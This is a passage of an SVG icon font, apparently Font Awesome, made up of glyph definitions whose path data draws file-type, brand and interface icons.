t443 -43zM768 384q237 0 443 43t325 127v-170q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5t-103 128v170q119 -84 325 -127t443 -43zM768 1536q208 0 385 -34.5t280 -93.5t103 -128v-128q0 -69 -103 -128t-280 -93.5t-385 -34.5t-385 34.5t-280 93.5
t-103 128v128q0 69 103 128t280 93.5t385 34.5z" />
    <glyph glyph-name="uniF1C1" unicode="&#xf1c1;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M894 465q33 -26 84 -56q59 7 117 7q147 0 177 -49q16 -22 2 -52q0 -1 -1 -2l-2 -2v-1q-6 -38 -71 -38q-48 0 -115 20t-130 53q-221 -24 -392 -83q-153 -262 -242 -262q-15 0 -28 7l-24 12q-1 1 -6 5q-10 10 -6 36q9 40 56 91.5t132 96.5q14 9 23 -6q2 -2 2 -4q52 85 107 197
q68 136 104 262q-24 82 -30.5 159.5t6.5 127.5q11 40 42 40h21h1q23 0 35 -15q18 -21 9 -68q-2 -6 -4 -8q1 -3 1 -8v-30q-2 -123 -14 -192q55 -164 146 -238zM318 54q52 24 137 158q-51 -40 -87.5 -84t-49.5 -74zM716 974q-15 -42 -2 -132q1 7 7 44q0 3 7 43q1 4 4 8
q-1 1 -1 2q-1 2 -1 3q-1 22 -13 36q0 -1 -1 -2v-2zM592 313q135 54 284 81q-2 1 -13 9.5t-16 13.5q-76 67 -127 176q-27 -86 -83 -197q-30 -56 -45 -83zM1238 329q-24 24 -140 24q76 -28 124 -28q14 0 18 1q0 1 -2 3z" />
    <glyph glyph-name="_422" unicode="&#xf1c2;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M233 768v-107h70l164 -661h159l128 485q7 20 10 46q2 16 2 24h4l3 -24q1 -3 3.5 -20t5.5 -26l128 -485h159l164 661h70v107h-300v-107h90l-99 -438q-5 -20 -7 -46l-2 -21h-4q0 3 -0.5 6.5t-1.5 8t-1 6.5q-1 5 -4 21t-5 25l-144 545h-114l-144 -545q-2 -9 -4.5 -24.5
t-3.5 -21.5l-4 -21h-4l-2 21q-2 26 -7 46l-99 438h90v107h-300z" />
    <glyph glyph-name="_423" unicode="&#xf1c3;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M429 106v-106h281v106h-75l103 161q5 7 10 16.5t7.5 13.5t3.5 4h2q1 -4 5 -10q2 -4 4.5 -7.5t6 -8t6.5 -8.5l107 -161h-76v-106h291v106h-68l-192 273l195 282h67v107h-279v-107h74l-103 -159q-4 -7 -10 -16.5t-9 -13.5l-2 -3h-2q-1 4 -5 10q-6 11 -17 23l-106 159h76v107
h-290v-107h68l189 -272l-194 -283h-68z" />
    <glyph glyph-name="_424" unicode="&#xf1c4;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M416 106v-106h327v106h-93v167h137q76 0 118 15q67 23 106.5 87t39.5 146q0 81 -37 141t-100 87q-48 19 -130 19h-368v-107h92v-555h-92zM769 386h-119v268h120q52 0 83 -18q56 -33 56 -115q0 -89 -62 -120q-31 -15 -78 -15z" />
    <glyph glyph-name="_425" unicode="&#xf1c5;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M1280 320v-320h-1024v192l192 192l128 -128l384 384zM448 512q-80 0 -136 56t-56 136t56 136t136 56t136 -56t56 -136t-56 -136t-136 -56z" />
    <glyph glyph-name="_426" unicode="&#xf1c6;" 
d="M640 1152v128h-128v-128h128zM768 1024v128h-128v-128h128zM640 896v128h-128v-128h128zM768 768v128h-128v-128h128zM1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400
v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-128v-128h-128v128h-512v-1536h1280zM781 593l107 -349q8 -27 8 -52q0 -83 -72.5 -137.5t-183.5 -54.5t-183.5 54.5t-72.5 137.5q0 25 8 52q21 63 120 396v128h128v-128h79
q22 0 39 -13t23 -34zM640 128q53 0 90.5 19t37.5 45t-37.5 45t-90.5 19t-90.5 -19t-37.5 -45t37.5 -45t90.5 -19z" />
    <glyph glyph-name="_427" unicode="&#xf1c7;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M620 686q20 -8 20 -30v-544q0 -22 -20 -30q-8 -2 -12 -2q-12 0 -23 9l-166 167h-131q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h131l166 167q16 15 35 7zM1037 -3q31 0 50 24q129 159 129 363t-129 363q-16 21 -43 24t-47 -14q-21 -17 -23.5 -43.5t14.5 -47.5
q100 -123 100 -282t-100 -282q-17 -21 -14.5 -47.5t23.5 -42.5q18 -15 40 -15zM826 145q27 0 47 20q87 93 87 219t-87 219q-18 19 -45 20t-46 -17t-20 -44.5t18 -46.5q52 -57 52 -131t-52 -131q-19 -20 -18 -46.5t20 -44.5q20 -17 44 -17z" />
    <glyph glyph-name="_428" unicode="&#xf1c8;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M768 768q52 0 90 -38t38 -90v-384q0 -52 -38 -90t-90 -38h-384q-52 0 -90 38t-38 90v384q0 52 38 90t90 38h384zM1260 766q20 -8 20 -30v-576q0 -22 -20 -30q-8 -2 -12 -2q-14 0 -23 9l-265 266v90l265 266q9 9 23 9q4 0 12 -2z" />
    <glyph glyph-name="_429" unicode="&#xf1c9;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
M480 768q8 11 21 12.5t24 -6.5l51 -38q11 -8 12.5 -21t-6.5 -24l-182 -243l182 -243q8 -11 6.5 -24t-12.5 -21l-51 -38q-11 -8 -24 -6.5t-21 12.5l-226 301q-14 19 0 38zM1282 467q14 -19 0 -38l-226 -301q-8 -11 -21 -12.5t-24 6.5l-51 38q-11 8 -12.5 21t6.5 24l182 243
l-182 243q-8 11 -6.5 24t12.5 21l51 38q11 8 24 6.5t21 -12.5zM662 6q-13 2 -20.5 13t-5.5 24l138 831q2 13 13 20.5t24 5.5l63 -10q13 -2 20.5 -13t5.5 -24l-138 -831q-2 -13 -13 -20.5t-24 -5.5z" />
    <glyph glyph-name="_430" unicode="&#xf1ca;" 
d="M1497 709v-198q-101 -23 -198 -23q-65 -136 -165.5 -271t-181.5 -215.5t-128 -106.5q-80 -45 -162 3q-28 17 -60.5 43.5t-85 83.5t-102.5 128.5t-107.5 184t-105.5 244t-91.5 314.5t-70.5 390h283q26 -218 70 -398.5t104.5 -317t121.5 -235.5t140 -195q169 169 287 406
q-142 72 -223 220t-81 333q0 192 104 314.5t284 122.5q178 0 273 -105.5t95 -297.5q0 -159 -58 -286q-7 -1 -19.5 -3t-46 -2t-63 6t-62 25.5t-50.5 51.5q31 103 31 184q0 87 -29 132t-79 45q-53 0 -85 -49.5t-32 -140.5q0 -186 105 -293.5t267 -107.5q62 0 121 14z" />
    <glyph glyph-name="_431" unicode="&#xf1cb;" horiz-adv-x="1792" 
d="M216 367l603 -402v359l-334 223zM154 511l193 129l-193 129v-258zM973 -35l603 402l-269 180l-334 -223v-359zM896 458l272 182l-272 182l-272 -182zM485 733l334 223v359l-603 -402zM1445 640l193 -129v258zM1307 733l269 180l-603 402v-359zM1792 913v-546
q0 -41 -34 -64l-819 -546q-21 -13 -43 -13t-43 13l-819 546q-34 23 -34 64v546q0 41 34 64l819 546q21 13 43 13t43 -13l819 -546q34 -23 34 -64z" />
    <glyph glyph-name="_432" unicode="&#xf1cc;" horiz-adv-x="2048" 
d="M1800 764q111 -46 179.5 -145.5t68.5 -221.5q0 -164 -118 -280.5t-285 -116.5q-4 0 -11.5 0.5t-10.5 0.5h-1209h-1h-2h-5q-170 10 -288 125.5t-118 280.5q0 110 55 203t147 147q-12 39 -12 82q0 115 82 196t199 81q95 0 172 -58q75 154 222.5 248t326.5 94
q166 0 306 -80.5t221.5 -218.5t81.5 -301q0 -6 -0.5 -18t-0.5 -18zM468 498q0 -122 84 -193t208 -71q137 0 240 99q-16 20 -47.5 56.5t-43.5 50.5q-67 -65 -144 -65q-55 0 -93.5 33.5t-38.5 87.5q0 53 38.5 87t91.5 34q44 0 84.5 -21t73 -55t65 -75t69 -82t77 -75t97 -55
t121.5 -21q121 0 204.5 71.5t83.5 190.5q0 121 -84 192t-207 71q-143 0 -241 -97l93 -108q66 64 142 64q52 0 92 -33t40 -84q0 -57 -37 -91.5t-94 -34.5q-43 0 -82.5 21t-72 55t-65.5 75t-69.5 82t-77.5 75t-96.5 55t-118.5 21q-122 0 -207 -70.5t-85 -189.5z" />
    <glyph glyph-name="_433" unicode="&#xf1cd;" horiz-adv-x="1792" 
d="M896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM896 1408q-190 0 -361 -90l194 -194q82 28 167 28t167 -28l194 194q-171 90 -361 90zM218 279l194 194
q-28 82 -28 167t28 167l-194 194q-90 -171 -90 -361t90 -361zM896 -128q190 0 361 90l-194 194q-82 -28 -167 -28t-167 28l-194 -194q171 -90 361 -90zM896 256q159 0 271.5 112.5t112.5 271.5t-112.5 271.5t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5
t271.5 -112.5zM1380 473l194 -194q90 171 90 361t-90 361l-194 -194q28 -82 28 -167t-28 -167z" />
    <glyph glyph-name="_434" unicode="&#xf1ce;" horiz-adv-x="1792" 
d="M1760 640q0 -176 -68.5 -336t-184 -275.5t-275.5 -184t-336 -68.5t-336 68.5t-275.5 184t-184 275.5t-68.5 336q0 213 97 398.5t265 305.5t374 151v-228q-221 -45 -366.5 -221t-145.5 -406q0 -130 51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5
t136.5 204t51 248.5q0 230 -145.5 406t-366.5 221v228q206 -31 374 -151t265 -305.5t97 -398.5z" />
    <glyph glyph-name="uniF1D0" unicode="&#xf1d0;" horiz-adv-x="1792" 
d="M19 662q8 217 116 406t305 318h5q0 -1 -1 -3q-8 -8 -28 -33.5t-52 -76.5t-60 -110.5t-44.5 -135.5t-14 -150.5t39 -157.5t108.5 -154q50 -50 102 -69.5t90.5 -11.5t69.5 23.5t47 32.5l16 16q39 51 53 116.5t6.5 122.5t-21 107t-26.5 80l-14 29q-10 25 -30.5 49.5t-43 41
t-43.5 29.5t-35 19l-13 6l104 115q39 -17 78 -52t59 -61l19 -27q1 48 -18.5 103.5t-40.5 87.5l-20 31l161 183l160 -181q-33 -46 -52.5 -102.5t-22.5 -90.5l-4 -33q22 37 61.5 72.5t67.5 52.5l28 17l103 -115q-44 -14 -85 -50t-60 -65l-19 -29q-31 -56 -48 -133.5t-7 -170
t57 -156.5q33 -45 77.5 -60.5t85 -5.5t76 26.5t57.5 33.5l21 16q60 53 96.5 115t48.5 121.5t10 121.5t-18 118t-37 107.5t-45.5 93t-45 72t-34.5 47.5l-13 17q-14 13 -7 13l10 -3q40 -29 62.5 -46t62 -50t64 -58t58.5 -65t55.5 -77t45.5 -88t38 -103t23.5 -117t10.5 -136
q3 -259 -108 -465t-312 -321t-456 -115q-185 0 -351 74t-283.5 198t-184 293t-60.5 353z" />
    <glyph glyph-name="uniF1D1" unicode="&#xf1d1;" horiz-adv-x="1792" 
d="M874 -102v-66q-208 6 -385 109.5t-283 275.5l58 34q29 -49 73 -99l65 57q148 -168 368 -212l-17 -86q65 -12 121 -13zM276 428l-83 -28q22 -60 49 -112l-57 -33q-98 180 -98 385t98 385l57 -33q-30 -56 -49 -112l82 -28q-35 -100 -35 -212q0 -109 36 -212zM1528 251
l58 -34q-106 -172 -283 -275.5t-385 -109.5v66q56 1 121 13l-17 86q220 44 368 212l65 -57q44 50 73 99zM1377 805l-233 -80q14 -42 14 -85t-14 -85l232 -80q-31 -92 -98 -169l-185 162q-57 -67 -147 -85l48 -241q-52 -10 -98 -10t-98 10l48 241q-90 18 -147 85l-185 -162
q-67 77 -98 169l232 80q-14 42 -14 85t14 85l-233 80q33 93 99 169l185 -162q59 68 147 86l-48 240q44 10 98 10t98 -10l-48 -240q88 -18 147 -86l185 162q66 -76 99 -169zM874 1448v-66q-65 -2 -121 -13l17 -86q-220 -42 -368 -211l-65 56q-38 -42 -73 -98l-57 33
q106 172 282 275.5t385 109.5zM1705 640q0 -205 -98 -385l-57 33q27 52 49 112l-83 28q36 103 36 212q0 112 -35 212l82 28q-19 56 -49 112l57 33q98 -180 98 -385zM1585 1063l-57 -33q-35 56 -73 98l-65 -56q-148 169 -368 211l17 86q-56 11 -121 13v66q209 -6 385 -109.5
t282 -275.5zM1748 640q0 173 -67.5 331t-181.5 272t-272 181.5t-331 67.5t-331 -67.5t-272 -181.5t-181.5 -272t-67.5 -331t67.5 -331t181.5 -272t272 -181.5t331 -67.5t331 67.5t272 181.5t181.5 272t67.5 331zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71
t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF1D2" unicode="&#xf1d2;" 
d="M582 228q0 -66 -93 -66q-107 0 -107 63q0 64 98 64q102 0 102 -61zM546 694q0 -85 -74 -85q-77 0 -77 84q0 90 77 90q36 0 55 -25.5t19 -63.5zM712 769v125q-78 -29 -135 -29q-50 29 -110 29q-86 0 -145 -57t-59 -143q0 -50 29.5 -102t73.5 -67v-3q-38 -17 -38 -85
q0 -53 41 -77v-3q-113 -37 -113 -139q0 -45 20 -78.5t54 -51t72 -25.5t81 -8q224 0 224 188q0 67 -48 99t-126 46q-27 5 -51.5 20.5t-24.5 39.5q0 44 49 52q77 15 122 70t45 134q0 24 -10 52q37 9 49 13zM771 350h137q-2 27 -2 82v387q0 46 2 69h-137q3 -23 3 -71v-392
q0 -50 -3 -75zM1280 366v121q-30 -21 -68 -21q-53 0 -53 82v225h52q9 0 26.5 -1t26.5 -1v117h-105q0 82 3 102h-140q4 -24 4 -55v-47h-60v-117q36 3 37 3q3 0 11 -0.5t12 -0.5v-2h-2v-217q0 -37 2.5 -64t11.5 -56.5t24.5 -48.5t43.5 -31t66 -12q64 0 108 24zM924 1072
q0 36 -24 63.5t-60 27.5t-60.5 -27t-24.5 -64q0 -36 25 -62.5t60 -26.5t59.5 27t24.5 62zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_438" unicode="&#xf1d3;" horiz-adv-x="1792" 
d="M595 22q0 100 -165 100q-158 0 -158 -104q0 -101 172 -101q151 0 151 105zM536 777q0 61 -30 102t-89 41q-124 0 -124 -145q0 -135 124 -135q119 0 119 137zM805 1101v-202q-36 -12 -79 -22q16 -43 16 -84q0 -127 -73 -216.5t-197 -112.5q-40 -8 -59.5 -27t-19.5 -58
q0 -31 22.5 -51.5t58 -32t78.5 -22t86 -25.5t78.5 -37.5t58 -64t22.5 -98.5q0 -304 -363 -304q-69 0 -130 12.5t-116 41t-87.5 82t-32.5 127.5q0 165 182 225v4q-67 41 -67 126q0 109 63 137v4q-72 24 -119.5 108.5t-47.5 165.5q0 139 95 231.5t235 92.5q96 0 178 -47
q98 0 218 47zM1123 220h-222q4 45 4 134v609q0 94 -4 128h222q-4 -33 -4 -124v-613q0 -89 4 -134zM1724 442v-196q-71 -39 -174 -39q-62 0 -107 20t-70 50t-39.5 78t-18.5 92t-4 103v351h2v4q-7 0 -19 1t-18 1q-21 0 -59 -6v190h96v76q0 54 -6 89h227q-6 -41 -6 -165h171
v-190q-15 0 -43.5 2t-42.5 2h-85v-365q0 -131 87 -131q61 0 109 33zM1148 1389q0 -58 -39 -101.5t-96 -43.5q-58 0 -98 43.5t-40 101.5q0 59 39.5 103t98.5 44q58 0 96.5 -44.5t38.5 -102.5z" />
    <glyph glyph-name="_439" unicode="&#xf1d4;" 
d="M809 532l266 499h-112l-157 -312q-24 -48 -44 -92l-42 92l-155 312h-120l263 -493v-324h101v318zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="uniF1D5" unicode="&#xf1d5;" horiz-adv-x="1280" 
d="M842 964q0 -80 -57 -136.5t-136 -56.5q-60 0 -111 35q-62 -67 -115 -146q-247 -371 -202 -859q1 -22 -12.5 -38.5t-34.5 -18.5h-5q-20 0 -35 13.5t-17 33.5q-14 126 -3.5 247.5t29.5 217t54 186t69 155.5t74 125q61 90 132 165q-16 35 -16 77q0 80 56.5 136.5t136.5 56.5
t136.5 -56.5t56.5 -136.5zM1223 953q0 -158 -78 -292t-212.5 -212t-292.5 -78q-64 0 -131 14q-21 5 -32.5 23.5t-6.5 39.5q5 20 23 31.5t39 7.5q51 -13 108 -13q97 0 186 38t153 102t102 153t38 186t-38 186t-102 153t-153 102t-186 38t-186 -38t-153 -102t-102 -153
t-38 -186q0 -114 52 -218q10 -20 3.5 -40t-25.5 -30t-39.5 -3t-30.5 26q-64 123 -64 265q0 119 46.5 227t124.5 186t186 124t226 46q158 0 292.5 -78t212.5 -212.5t78 -292.5z" />
    <glyph glyph-name="uniF1D6" unicode="&#xf1d6;" horiz-adv-x="1792" 
d="M270 730q-8 19 -8 52q0 20 11 49t24 45q-1 22 7.5 53t22.5 43q0 139 92.5 288.5t217.5 209.5q139 66 324 66q133 0 266 -55q49 -21 90 -48t71 -56t55 -68t42 -74t32.5 -84.5t25.5 -89.5t22 -98l1 -5q55 -83 55 -150q0 -14 -9 -40t-9 -38q0 -1 1.5 -3.5t3.5 -5t2 -3.5
q77 -114 120.5 -214.5t43.5 -208.5q0 -43 -19.5 -100t-55.5 -57q-9 0 -19.5 7.5t-19 17.5t-19 26t-16 26.5t-13.5 26t-9 17.5q-1 1 -3 1l-5 -4q-59 -154 -132 -223q20 -20 61.5 -38.5t69 -41.5t35.5 -65q-2 -4 -4 -16t-7 -18q-64 -97 -302 -97q-53 0 -110.5 9t-98 20
t-104.5 30q-15 5 -23 7q-14 4 -46 4.5t-40 1.5q-41 -45 -127.5 -65t-168.5 -20q-35 0 -69 1.5t-93 9t-101 20.5t-74.5 40t-32.5 64q0 40 10 59.5t41 48.5q11 2 40.5 13t49.5 12q4 0 14 2q2 2 2 4l-2 3q-48 11 -108 105.5t-73 156.5l-5 3q-4 0 -12 -20q-18 -41 -54.5 -74.5
t-77.5 -37.5h-1q-4 0 -6 4.5t-5 5.5q-23 54 -23 100q0 275 252 466z" />
    <glyph glyph-name="uniF1D7" unicode="&#xf1d7;" horiz-adv-x="2048" 
d="M580 1075q0 41 -25 66t-66 25q-43 0 -76 -25.5t-33 -65.5q0 -39 33 -64.5t76 -25.5q41 0 66 24.5t25 65.5zM1323 568q0 28 -25.5 50t-65.5 22q-27 0 -49.5 -22.5t-22.5 -49.5q0 -28 22.5 -50.5t49.5 -22.5q40 0 65.5 22t25.5 51zM1087 1075q0 41 -24.5 66t-65.5 25
q-43 0 -76 -25.5t-33 -65.5q0 -39 33 -64.5t76 -25.5q41 0 65.5 24.5t24.5 65.5zM1722 568q0 28 -26 50t-65 22q-27 0 -49.5 -22.5t-22.5 -49.5q0 -28 22.5 -50.5t49.5 -22.5q39 0 65 22t26 51zM1456 965q-31 4 -70 4q-169 0 -311 -77t-223.5 -208.5t-81.5 -287.5
q0 -78 23 -152q-35 -3 -68 -3q-26 0 -50 1.5t-55 6.5t-44.5 7t-54.5 10.5t-50 10.5l-253 -127l72 218q-290 203 -290 490q0 169 97.5 311t264 223.5t363.5 81.5q176 0 332.5 -66t262 -182.5t136.5 -260.5zM2048 404q0 -117 -68.5 -223.5t-185.5 -193.5l55 -181l-199 109
q-150 -37 -218 -37q-169 0 -311 70.5t-223.5 191.5t-81.5 264t81.5 264t223.5 191.5t311 70.5q161 0 303 -70.5t227.5 -192t85.5 -263.5z" />
    <glyph glyph-name="_443" unicode="&#xf1d8;" horiz-adv-x="1792" 
d="M1764 1525q33 -24 27 -64l-256 -1536q-5 -29 -32 -45q-14 -8 -31 -8q-11 0 -24 5l-453 185l-242 -295q-18 -23 -49 -23q-13 0 -22 4q-19 7 -30.5 23.5t-11.5 36.5v349l864 1059l-1069 -925l-395 162q-37 14 -40 55q-2 40 32 59l1664 960q15 9 32 9q20 0 36 -11z" />
    <glyph glyph-name="_444" unicode="&#xf1d9;" horiz-adv-x="1792" 
d="M1764 1525q33 -24 27 -64l-256 -1536q-5 -29 -32 -45q-14 -8 -31 -8q-11 0 -24 5l-527 215l-298 -327q-18 -21 -47 -21q-14 0 -23 4q-19 7 -30 23.5t-11 36.5v452l-472 193q-37 14 -40 55q-3 39 32 59l1664 960q35 21 68 -2zM1422 26l221 1323l-1434 -827l336 -137
l863 639l-478 -797z" />
    <glyph glyph-name="_445" unicode="&#xf1da;" 
d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61q-172 0 -327 72.5t-264 204.5q-7 10 -6.5 22.5t8.5 20.5l137 138q10 9 25 9q16 -2 23 -12q73 -95 179 -147t225 -52q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5
t-163.5 109.5t-198.5 40.5q-98 0 -188 -35.5t-160 -101.5l137 -138q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l130 -129q107 101 244.5 156.5t284.5 55.5q156 0 298 -61t245 -164t164 -245t61 -298zM896 928v-448q0 -14 -9 -23
t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23z" />
    <glyph glyph-name="_446" unicode="&#xf1db;" 
d="M768 1280q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5t-51 248.5t-136.5 204t-204 136.5t-248.5 51zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103
t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="_447" unicode="&#xf1dc;" horiz-adv-x="1792" 
d="M1682 -128q-44 0 -132.5 3.5t-133.5 3.5q-44 0 -132 -3.5t-132 -3.5q-24 0 -37 20.5t-13 45.5q0 31 17 46t39 17t51 7t45 15q33 21 33 140l-1 391q0 21 -1 31q-13 4 -50 4h-675q-38 0 -51 -4q-1 -10 -1 -31l-1 -371q0 -142 37 -164q16 -10 48 -13t57 -3.5t45 -15
t20 -45.5q0 -26 -12.5 -48t-36.5 -22q-47 0 -139.5 3.5t-138.5 3.5q-43 0 -128 -3.5t-127 -3.5q-23 0 -35.5 21t-12.5 45q0 30 15.5 45t36 17.5t47.5 7.5t42 15q33 23 33 143l-1 57v813q0 3 0.5 26t0 36.5t-1.5 38.5t-3.5 42t-6.5 36.5t-11 31.5t-16 18q-15 10 -45 12t-53 2
t-41 14t-18 45q0 26 12 48t36 22q46 0 138.5 -3.5t138.5 -3.5q42 0 126.5 3.5t126.5 3.5q25 0 37.5 -22t12.5 -48q0 -30 -17 -43.5t-38.5 -14.5t-49.5 -4t-43 -13q-35 -21 -35 -160l1 -320q0 -21 1 -32q13 -3 39 -3h699q25 0 38 3q1 11 1 32l1 320q0 139 -35 160
q-18 11 -58.5 12.5t-66 13t-25.5 49.5q0 26 12.5 48t37.5 22q44 0 132 -3.5t132 -3.5q43 0 129 3.5t129 3.5q25 0 37.5 -22t12.5 -48q0 -30 -17.5 -44t-40 -14.5t-51.5 -3t-44 -12.5q-35 -23 -35 -161l1 -943q0 -119 34 -140q16 -10 46 -13.5t53.5 -4.5t41.5 -15.5t18 -44.5
q0 -26 -12 -48t-36 -22z" />
    <glyph glyph-name="_448" unicode="&#xf1dd;" horiz-adv-x="1280" 
d="M1278 1347v-73q0 -29 -18.5 -61t-42.5 -32q-50 0 -54 -1q-26 -6 -32 -31q-3 -11 -3 -64v-1152q0 -25 -18 -43t-43 -18h-108q-25 0 -43 18t-18 43v1218h-143v-1218q0 -25 -17.5 -43t-43.5 -18h-108q-26 0 -43.5 18t-17.5 43v496q-147 12 -245 59q-126 58 -192 179
q-64 117 -64 259q0 166 88 286q88 118 209 159q111 37 417 37h479q25 0 43 -18t18 -43z" />
    <glyph glyph-name="_449" unicode="&#xf1de;" 
d="M352 128v-128h-352v128h352zM704 256q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM864 640v-128h-864v128h864zM224 1152v-128h-224v128h224zM1536 128v-128h-736v128h736zM576 1280q26 0 45 -19t19 -45v-256
q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM1216 768q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM1536 640v-128h-224v128h224zM1536 1152v-128h-864v128h864z" />
    <glyph glyph-name="uniF1E0" unicode="&#xf1e0;" 
d="M1216 512q133 0 226.5 -93.5t93.5 -226.5t-93.5 -226.5t-226.5 -93.5t-226.5 93.5t-93.5 226.5q0 12 2 34l-360 180q-92 -86 -218 -86q-133 0 -226.5 93.5t-93.5 226.5t93.5 226.5t226.5 93.5q126 0 218 -86l360 180q-2 22 -2 34q0 133 93.5 226.5t226.5 93.5
t226.5 -93.5t93.5 -226.5t-93.5 -226.5t-226.5 -93.5q-126 0 -218 86l-360 -180q2 -22 2 -34t-2 -34l360 -180q92 86 218 86z" />
    <glyph glyph-name="_451" unicode="&#xf1e1;" 
d="M1280 341q0 88 -62.5 151t-150.5 63q-84 0 -145 -58l-241 120q2 16 2 23t-2 23l241 120q61 -58 145 -58q88 0 150.5 63t62.5 151t-62.5 150.5t-150.5 62.5t-151 -62.5t-63 -150.5q0 -7 2 -23l-241 -120q-62 57 -145 57q-88 0 -150.5 -62.5t-62.5 -150.5t62.5 -150.5
t150.5 -62.5q83 0 145 57l241 -120q-2 -16 -2 -23q0 -88 63 -150.5t151 -62.5t150.5 62.5t62.5 150.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_452" unicode="&#xf1e2;" horiz-adv-x="1792" 
d="M571 947q-10 25 -34 35t-49 0q-108 -44 -191 -127t-127 -191q-10 -25 0 -49t35 -34q13 -5 24 -5q42 0 60 40q34 84 98.5 148.5t148.5 98.5q25 11 35 35t0 49zM1513 1303l46 -46l-244 -243l68 -68q19 -19 19 -45.5t-19 -45.5l-64 -64q89 -161 89 -343q0 -143 -55.5 -273.5
